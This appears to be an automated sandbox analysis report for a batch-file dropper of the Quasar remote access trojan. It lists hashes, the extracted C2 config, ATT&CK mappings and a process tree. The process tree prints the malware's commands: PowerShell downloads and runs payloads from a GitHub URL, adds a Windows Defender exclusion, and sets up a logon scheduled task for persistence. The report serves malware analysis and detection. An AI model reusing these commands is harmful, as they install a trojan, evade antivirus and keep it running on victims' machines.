quasar | 57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7

General

Target

main (1).bat
Size

15KB
MD5

837e6e693eab2459822a681dd8829347
SHA1

77417d665e66ae2f962f52b3d7c916f0772f0615
SHA256

57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7
SHA512

54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48
SSDEEP

384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn

Score

10^/10

quasar bot execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes

encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
install_name
Modification1.5.14.12.exe
log_directory
Logs
reconnect_delay
3126
startup_key
explorer.dll
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe	family_quasar
behavioral1/memory/4844-46-0x0000000000560000-0x0000000000884000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 1812 powershell.exe
4 416 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4816 powershell.exe
1812 powershell.exe
416 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

pid process

4844 Modification11910275.exe
3468 Modification1.5.14.12.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com
4 raw.githubusercontent.com

flow	pid	process
2	1812	powershell.exe
4	416	powershell.exe

pid	process
4816	powershell.exe
1812	powershell.exe
416	powershell.exe

pid	process
4844	Modification11910275.exe
3468	Modification1.5.14.12.exe

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

description	ioc	process
File created	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification1.5.14.12.exe
File opened for modification	C:\Windows\system32\SubDir	Modification1.5.14.12.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2384 schtasks.exe
2072 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1812 powershell.exe
1812 powershell.exe
4816 powershell.exe
4816 powershell.exe
416 powershell.exe
416 powershell.exe

pid	process
2384	schtasks.exe
2072	schtasks.exe

pid	process
1812	powershell.exe
1812	powershell.exe
4816	powershell.exe
4816	powershell.exe
416	powershell.exe
416	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeDebugPrivilege	4844	Modification11910275.exe
Token: SeDebugPrivilege	3468	Modification1.5.14.12.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Modification1.5.14.12.exe

pid process

3468 Modification1.5.14.12.exe

pid	process
3468	Modification1.5.14.12.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.execmd.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process	target process
PID 3928 wrote to memory of 1812	3928	cmd.exe	powershell.exe
PID 3928 wrote to memory of 1812	3928	cmd.exe	powershell.exe
PID 3928 wrote to memory of 3668	3928	cmd.exe	cmd.exe
PID 3928 wrote to memory of 3668	3928	cmd.exe	cmd.exe
PID 3668 wrote to memory of 1492	3668	cmd.exe	cacls.exe
PID 3668 wrote to memory of 1492	3668	cmd.exe	cacls.exe
PID 3668 wrote to memory of 4816	3668	cmd.exe	powershell.exe
PID 3668 wrote to memory of 4816	3668	cmd.exe	powershell.exe
PID 3668 wrote to memory of 416	3668	cmd.exe	powershell.exe
PID 3668 wrote to memory of 416	3668	cmd.exe	powershell.exe
PID 3668 wrote to memory of 4844	3668	cmd.exe	Modification11910275.exe
PID 3668 wrote to memory of 4844	3668	cmd.exe	Modification11910275.exe
PID 4844 wrote to memory of 2384	4844	Modification11910275.exe	schtasks.exe
PID 4844 wrote to memory of 2384	4844	Modification11910275.exe	schtasks.exe
PID 4844 wrote to memory of 3468	4844	Modification11910275.exe	Modification1.5.14.12.exe
PID 4844 wrote to memory of 3468	4844	Modification11910275.exe	Modification1.5.14.12.exe
PID 3468 wrote to memory of 2072	3468	Modification1.5.14.12.exe	schtasks.exe
PID 3468 wrote to memory of 2072	3468	Modification1.5.14.12.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main (1).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K installer.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Set-MpPreference -ExclusionExtension exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:416
- - C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
    Modification11910275.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2384
  - - C:\Windows\system32\SubDir\Modification1.5.14.12.exe
      "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3468
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ea5a0b15a4152d282737ef33992467aa

SHA1
e9188e3a25982b1477c6cbed57b46e091f4ad70e

SHA256
8ddb2cb1482af22dff12819c55aa24d3e83dadbbc410e656b7f591422e627503

SHA512
875ef3bf42d6ffd198b00e50f1cc7d539a410a9610fe3e87a47b44d7e4eabff7907672fbc6dc63fbe941d90217de0bb47c86ef8b0a9d17c04b9fd1cd9ecf33bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

Filesize
3.1MB

MD5
fa9b1524e725c4a251d07007f15fa947

SHA1
5c023619d8180b611acb544fa1cd8bd31de9e61c

SHA256
0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

SHA512
dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q41z0ydz.tcj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
996B

MD5
9573128d5eac791a88ae169d4941e267

SHA1
5bbcbca4753c6c2e145ac68712c3eb68eb1512f3

SHA256
1562ce54110ea27bad805f00f40e9bf78322dde78d4f900deee7e4cce17a70dd

SHA512
d2fd5846cebf28ee3b159f9743fa63d4bec31ccdb2a431305b8a80b8cbcbfddb50e9d29374d4bc381ac46a1e399fb703af5c38f83834949256d57968817e7522

Download Submit
memory/1812-11-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/1812-16-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/1812-12-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/1812-0-0x00007FF834CF3000-0x00007FF834CF5000-memory.dmp

Filesize
8KB

Download
memory/1812-10-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/1812-9-0x00000261BCD70000-0x00000261BCD92000-memory.dmp

Filesize
136KB

Download
memory/3468-58-0x000000001C660000-0x000000001C69C000-memory.dmp

Filesize
240KB

Download
memory/3468-53-0x000000001BD10000-0x000000001BD60000-memory.dmp

Filesize
320KB

Download
memory/3468-57-0x000000001BDF0000-0x000000001BE02000-memory.dmp

Filesize
72KB

Download
memory/3468-54-0x000000001C720000-0x000000001C7D2000-memory.dmp

Filesize
712KB

Download
memory/4816-25-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/4816-31-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/4816-19-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

Filesize
10.8MB

Download
memory/4844-46-0x0000000000560000-0x0000000000884000-memory.dmp

Filesize
3.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads